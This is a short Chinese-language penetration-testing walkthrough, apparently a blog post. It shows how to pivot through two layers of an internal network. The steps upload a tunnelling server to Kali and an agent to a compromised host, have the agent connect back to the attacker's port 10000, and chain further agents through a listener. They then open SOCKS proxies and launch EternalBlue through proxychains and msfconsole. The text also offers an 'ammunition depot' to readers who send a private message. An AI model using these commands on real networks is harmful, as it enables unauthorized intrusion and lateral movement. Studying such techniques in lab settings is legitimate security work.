目录
渗透带出主机阶段
先把我们的服务端上传到kali
先把我们的客户端上传到目标机
客户端去连接我们的kali机端口去上线
出现admin,上线成功
detail相当于msf的sessions
和msf差不多功能,但是我们用它主要是搞隧道代理 抓发的
开启socks代理
rce二层内网后继续上传客户端
进入目标一开启监听1001端口
连接服务端
成功上线二层内网主机
进入上线的二层内网开socks代理端口30000
成功带出192.168.33.22
kali配置代理,开始攻击
远程桌面攻击编辑
永恒之蓝打
后台私信可获取弹药库
渗透带出主机阶段
先把我们的服务端上传到kali
chmod u+x admin
./admin -l 10000 -s crazy #-l 10000是开启10000端口,-s crazy是设置的密码
先把我们的客户端上传到目标机
客户端去连接我们的kali机端口去上线
chmod u+x agent
./agent -c 192.168.20.128:10000 -s crazy
出现admin,上线成功
detail相当于msf的sessions
和msf差不多功能,但是我们用它主要是搞隧道代理 抓发的
开启socks代理
注意:在我们的上线目标一内网主机上开启
back #要是想切换上线主机可以back退出一下
use 0
socks 20000
成功带出二层内网主机
rce二层内网后继续上传客户端
进入目标一开启监听1001端口
listen
连接服务端
因为二层不出网但是能够联通192.168.22.11
agent -c 192.168.22.11:10001 -s crazy
成功上线二层内网主机
进入上线的二层内网开socks代理端口30000
成功带出192.168.33.22
kali配置代理,开始攻击
vim /etc/proxychains4.conf

远程桌面攻击
永恒之蓝打
proxychains msfconsole